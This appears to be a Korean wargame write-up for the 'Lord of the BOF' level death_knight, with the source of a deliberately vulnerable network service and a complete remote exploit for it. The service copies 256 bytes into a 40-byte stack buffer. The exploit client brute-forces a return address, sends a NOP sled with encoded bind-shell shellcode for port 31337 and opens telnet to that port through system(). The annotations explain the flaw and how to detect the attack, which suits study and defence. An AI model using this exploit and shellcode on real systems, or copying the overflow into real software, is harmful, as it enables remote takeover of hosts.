[bof 원정대] xavius -> death_knight (remote bof) 본문
/*
The Lord of the BOF : The Fellowship of the BOF
- dark knight
- remote BOF
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <dumpcode.h>
/*
 * Wargame target (death_knight): a forking TCP service on port 6666, bound
 * to all interfaces, that greets each client and reads a single reply.
 *
 * Security-relevant defect (intentional for the exercise): the child passes
 * a length of 256 to recv() while `buffer` is only 40 bytes, so any reply
 * longer than 40 bytes writes past the buffer into the rest of main()'s
 * stack frame (stack-based buffer overflow, CWE-121). The child then breaks
 * out of the accept loop and returns from main(), i.e. it uses main()'s
 * saved return state after that state may have been overwritten.
 *
 * Outside a training setting the receive length would be sizeof(buffer) and
 * the recv() result would be checked; compiler and OS hardening (stack
 * protector, non-executable stack, ASLR) are the usual additional layers.
 */
main()
{
char buffer[40]; /* 40-byte stack buffer; the only destination of recv() below */
int server_fd, client_fd;
struct sockaddr_in server_addr;
struct sockaddr_in client_addr;
int sin_size; /* NOTE(review): accept() takes a socklen_t *; an int is passed here */
if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("socket");
exit(1);
}
/* Listen on TCP 6666 on every local address (INADDR_ANY). */
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(6666);
server_addr.sin_addr.s_addr = INADDR_ANY;
bzero(&(server_addr.sin_zero), 8);
if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){
perror("bind");
exit(1);
}
if(listen(server_fd, 10) == -1){
perror("listen");
exit(1);
}
while(1) {
sin_size = sizeof(struct sockaddr_in);
if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){
perror("accept");
continue;
}
/* fork() returns 0 in the child: one child process handles one client. */
if (!fork()){
send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);
send(client_fd, "You : ", 6, 0);
/* Overflow: up to 256 bytes are accepted into the 40-byte buffer, and the
 * number of bytes actually received is never looked at. */
recv(client_fd, buffer, 256, 0);
close(client_fd);
/* Child leaves the loop and falls through to the end of main(). */
break;
}
/* Parent: drop its copy of the client socket and reap any exited children
 * without blocking (WNOHANG). */
close(client_fd);
while(waitpid(-1,NULL,WNOHANG) > 0);
}
close(server_fd);
}
exploit 코드
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* Shorthand for the generic socket address type used in the connect() cast. */
#define SA struct sockaddr
/* Size of the buffer built for each attempt; the same value as the 256-byte
 * length the service passes to recv(). */
#define BUFSIZE 256
/* Position in the sent buffer where the guessed return address is written.
 * Presumably the service's 40-byte buffer plus a 4-byte saved frame pointer
 * on 32-bit x86 -- confirm against the actual target build. */
#define OFFSET 44
/* Opaque machine-code payload copied into the sent buffer by main(); it is
 * not decoded or verified here. Judging only by its name and by BINDPORT
 * below, it presumably makes the compromised process listen on TCP 31337 --
 * unverified. For defenders, an unexpected listener on that port owned by
 * the service's child process is the corresponding indicator. */
char bindport[] =
"\xeb\x11\x5e\x31\xc9\xb1\x6b\x80\x6c\x0e\xff\x35\x80\xe9\x01"
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xe5\x7b\xbd\x0e\x02\xb5"
"\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8"
"\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\xaf\x9e\xbe\x16\x9f"
"\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16"
"\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b"
"\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5"
"\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e"
"\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5";
/* Port that main() points telnet at after every attempt. */
#define BINDPORT 31337
/*
 * Client for the death_knight wargame level.
 *
 * argv[1] is the target IPv4 address and argv[2] the service port. Each loop
 * iteration opens a new TCP connection, sends one crafted reply, then runs
 * `telnet <target> 31337` through system(). The loop has no success test;
 * it only ends if socket() fails.
 *
 * What this looks like from the service side: a rapid series of short-lived
 * connections from one source, each carrying a reply far longer than the
 * 40 bytes the service expects and consisting mostly of 0x90 bytes, likely
 * accompanied by repeatedly crashing child processes while the address is
 * still being guessed, and followed by connection attempts to TCP 31337.
 */
int main (int argc, char *argv[])
{
int sockfd;
struct sockaddr_in target_addr;
unsigned char buffer[BUFSIZE];
/* Starting guess near the top of the 32-bit user stack; lowered on every
 * attempt below, i.e. the address is guessed rather than known. */
unsigned int retaddr = 0xbffffff0;
char cmd[100];
if (argc != 3) {
fprintf(stderr, "Usage: %s <Target Address> <Port>\n", argv[0]);
return -1;
}
/* NOTE(review): argv[1] is formatted unchecked into a 100-byte buffer and
 * the result is later handed to a shell via system(). */
sprintf(cmd, "%s %s %d", "telnet", argv[1], BINDPORT);
while (1) {
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
perror ("socket error");
return -1;
}
memset(&target_addr, 0, sizeof(target_addr));
target_addr.sin_family = AF_INET;
target_addr.sin_port = htons(atoi(argv[2]));
target_addr.sin_addr.s_addr = inet_addr(argv[1]);
if (connect (sockfd, (SA*)&target_addr, sizeof(target_addr)) == -1) {
perror ("connect error");
close(sockfd);
continue;
}
/* Step the guessed address down by 10 bytes for this attempt. */
retaddr -= 10;
/* Fill with 0x90 bytes, place the 4-byte guessed address at OFFSET and the
 * payload at byte 100 of the buffer. */
memset(buffer, '\x90', sizeof(buffer));
memcpy(buffer+OFFSET, &retaddr, 4);
memcpy(buffer+100, bindport, strlen(bindport));
/* The send length comes from strlen(), not from BUFSIZE. */
send(sockfd, buffer, strlen(buffer), 0);
/* Runs the telnet command built above; blocks until it exits. */
system(cmd);
close(sockfd);
}
return 0;
}
bof 공격
최종인증